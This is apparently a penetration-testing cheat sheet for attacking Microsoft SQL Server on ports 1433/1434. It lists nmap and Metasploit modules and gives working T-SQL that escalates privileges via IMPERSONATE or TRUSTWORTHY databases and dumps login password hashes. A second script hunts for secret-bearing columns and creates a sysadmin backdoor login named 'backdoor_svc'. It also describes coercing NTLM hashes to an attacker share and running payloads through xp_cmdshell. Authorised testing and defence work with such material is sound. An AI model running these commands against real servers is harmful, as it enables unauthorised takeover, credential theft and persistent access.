Port 1433/1434 - MSSQL

MSSQL

Microsoft SQL Server (MSSQL) commonly exposes two ports:

  1. 1433/TCP - The default port of the default instance; clients speak TDS to the database engine here.

  2. 1434/UDP - The SQL Server Browser service. It lists the instances on the host and the port each one listens on; named instances are usually assigned a dynamic high port, which is why this service exists.

Weak or default credentials such as sa:sa are common. sa is the built-in login that belongs to the sysadmin fixed server role, so it gives full control of the instance.

MSSQL Scanning and Enumeration

| Tool | Script/Module | Auth | MITRE ATT&CK Tactic | Command |
| --- | --- | --- | --- | --- |
| MSF | mssql_enum | Y | Reconnaissance | |
| MSF | mssql_ping | N | Reconnaissance | |
| Nmap | ms-sql-info | N | Reconnaissance | sudo nmap -A -p 1433,1434 -n 10.10.10.10 |

Auth means the module needs a valid database login: mssql_ping only queries the Browser service on 1434/UDP, while mssql_enum logs in and audits the configuration. Note that the nmap command above is a TCP scan, so 1434 is only probed over TCP; add a UDP scan (for example -sU -p 1434, or -sS -sU -p T:1433,U:1434) to reach the Browser service itself.

MSSQL Exploitation

| Tool | Script/Module | Auth | MITRE ATT&CK Tactic | Notes |
| --- | --- | --- | --- | --- |
| MSF | mssql_escalate_dbowner, mssql_escalate_execute_as | Y | Privilege Escalation | Escalate a low-privileged login to sysadmin, either through db_owner rights on a TRUSTWORTHY database owned by a sysadmin, or through an IMPERSONATE grant (EXECUTE AS LOGIN) on a sysadmin login |
| MSF | mssql_hashdump | Y | Credential Access | Dumps login password hashes from sys.sql_logins; needs sysadmin-level rights to see the hashes |
| MSF | mssql_idf | Y | Discovery | Interesting Data Finder: searches table and column names for keywords such as password |
| MSF | mssql_local_auth_bypass | Y | Persistence, Privilege Escalation | Post module run from a local Meterpreter session with SYSTEM or local admin rights; uses the SQL Server service's own OS context to add a sysadmin login |
| MSF | mssql_ntlm_stealer | Y | Credential Access | Makes the server call xp_dirtree against an attacker-controlled UNC path so the SQL Server service account authenticates to it; pair it with an SMB capture listener to collect the NetNTLM hash |
| MSF | mssql_payload | Y | Execution | Uploads and runs a payload, by default through xp_cmdshell |
| MSF | mssql_sql_file | Y | Execution | Runs the T-SQL statements in a local file against the server |
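What mssql_escalate_execute_as, mssql_escalate_dbowner and mssql_hashdump check can also be done by hand from any SQL client. The T-SQL below is an added example written for this page, not code from those modules or from the original page; it relies only on built-in catalog views and the built-in sa login, and the database name MyDb in the db_owner check is a placeholder for whichever database the earlier query flags.

```sql
-- 1. Baseline: who is this login, and is it already sysadmin?
SELECT SYSTEM_USER AS login_name, IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;

-- 2. Path used by mssql_escalate_execute_as: IMPERSONATE grants on logins.
--    An IMPERSONATE grant on a sysadmin login lets the grantee run as sysadmin.
SELECT grantee.name AS grantee,
       target.name  AS can_impersonate,
       IS_SRVROLEMEMBER('sysadmin', target.name) AS target_is_sysadmin
FROM sys.server_permissions AS p
JOIN sys.server_principals AS grantee ON p.grantee_principal_id = grantee.principal_id
JOIN sys.server_principals AS target  ON p.major_id = target.principal_id
WHERE p.class_desc = 'SERVER_PRINCIPAL'
  AND p.permission_name = 'IMPERSONATE';

-- If the current login (or a role it belongs to) may impersonate sa, switch
-- context, confirm the new privileges, and REVERT when finished.
EXECUTE AS LOGIN = 'sa';
SELECT SYSTEM_USER AS running_as, IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;
REVERT;

-- 3. Path used by mssql_escalate_dbowner: a TRUSTWORTHY database owned by a
--    sysadmin in which this login is db_owner. A procedure created there
--    WITH EXECUTE AS OWNER runs as that sysadmin and can add logins to the role.
SELECT d.name AS database_name,
       SUSER_SNAME(d.owner_sid) AS owner_login,
       IS_SRVROLEMEMBER('sysadmin', SUSER_SNAME(d.owner_sid)) AS owner_is_sysadmin
FROM sys.databases AS d
WHERE d.is_trustworthy_on = 1;

-- Then, inside each candidate database (MyDb is a placeholder name):
USE [MyDb];
SELECT IS_MEMBER('db_owner') AS is_db_owner;

-- 4. What mssql_hashdump collects: SQL login password hashes. The hash column
--    is only populated when the caller has sysadmin-level (CONTROL SERVER) rights.
SELECT name,
       CONVERT(VARCHAR(514), password_hash, 1) AS password_hash,
       is_disabled
FROM sys.sql_logins;
```

Run the four parts in order: if part 1 already reports sysadmin, parts 2 and 3 are unnecessary, and part 4 will return real hashes rather than NULLs.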

MSSQL Database Interaction

mssqlclient.py, the Python client that ships with the Impacket suite (pre-installed on Kali Linux, where it is also invoked as impacket-mssqlclient), can be used to interact with a remote MSSQL server.

# Connecting to a remote MSSQL server with Windows authentication (fill in the database, domain, username, password and IP address).
# For a SQL-authenticated login such as sa, drop -windows-auth and the DOMAIN/ prefix.
mssqlclient.py -db %DATABASE% -windows-auth %DOMAIN%/%USERNAME%:%PASSWORD%@%IP%

# Database enumeration (T-SQL, typed at the SQL> prompt)
SELECT * FROM %TABLE%;  -- show all rows stored in the selected table
SELECT * FROM %DATABASE%.INFORMATION_SCHEMA.TABLES;  -- list the tables in the selected database

# Exploitation: create a new login and grant it the sysadmin role (requires sysadmin rights already)
CREATE LOGIN %USERNAME% WITH PASSWORD = '%PASSWORD%';
EXEC sp_addsrvrolemember '%USERNAME%', 'sysadmin';  -- deprecated since SQL Server 2012; ALTER SERVER ROLE sysadmin ADD MEMBER %USERNAME% is the current form
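A fuller enumerate-then-backdoor sequence built on the snippet above, added here as an example rather than taken from the page: MyDb stands for whichever database you target, and the login backdoor_svc and its password are made up. It uses ALTER SERVER ROLE in place of the deprecated sp_addsrvrolemember, and bracketed identifiers with a quoted literal so that a name or password containing a quote does not break the statement.

```sql
-- Version and identity
SELECT @@VERSION AS version;
SELECT SYSTEM_USER AS login_name, USER_NAME() AS db_user;

-- Databases, their owning logins, and whether this login can open them
SELECT name, SUSER_SNAME(owner_sid) AS owner_login, HAS_DBACCESS(name) AS can_access
FROM sys.databases
ORDER BY database_id;

-- Tables of a database without switching context (MyDb is a placeholder name)
SELECT TABLE_SCHEMA, TABLE_NAME
FROM [MyDb].INFORMATION_SCHEMA.TABLES
WHERE TABLE_TYPE = 'BASE TABLE';

-- Columns whose names hint at secrets (what mssql_idf automates, per database)
SELECT TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME, DATA_TYPE
FROM [MyDb].INFORMATION_SCHEMA.COLUMNS
WHERE COLUMN_NAME LIKE '%pass%'
   OR COLUMN_NAME LIKE '%pwd%'
   OR COLUMN_NAME LIKE '%secret%'
   OR COLUMN_NAME LIKE '%token%';

-- Create a login and make it sysadmin (needs sysadmin rights already).
-- Bracketed identifiers and a quoted literal keep names with spaces or quotes
-- from breaking the statement; double any single quote inside the password.
-- backdoor_svc and the password are made-up values for this example.
CREATE LOGIN [backdoor_svc] WITH PASSWORD = 'Str0ng!Passw0rd#2024', CHECK_POLICY = OFF;
ALTER SERVER ROLE [sysadmin] ADD MEMBER [backdoor_svc];    -- SQL Server 2012 and later
-- EXEC sp_addsrvrolemember 'backdoor_svc', 'sysadmin';     -- pre-2012 equivalent, deprecated

-- Verify: the new login should now be listed among the sysadmin members
SELECT IS_SRVROLEMEMBER('sysadmin', 'backdoor_svc') AS backdoor_is_sysadmin;
SELECT m.name AS member, m.type_desc
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON rm.role_principal_id = r.principal_id
JOIN sys.server_principals AS m ON rm.member_principal_id = m.principal_id
WHERE r.name = 'sysadmin';

-- Clean up at the end of the engagement
ALTER SERVER ROLE [sysadmin] DROP MEMBER [backdoor_svc];
DROP LOGIN [backdoor_svc];
```

Type the statements at mssqlclient.py's SQL> prompt one at a time, or save the file and feed it to the server with mssql_sql_file; keep the two cleanup lines at the end so the login is removed once the engagement is over.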
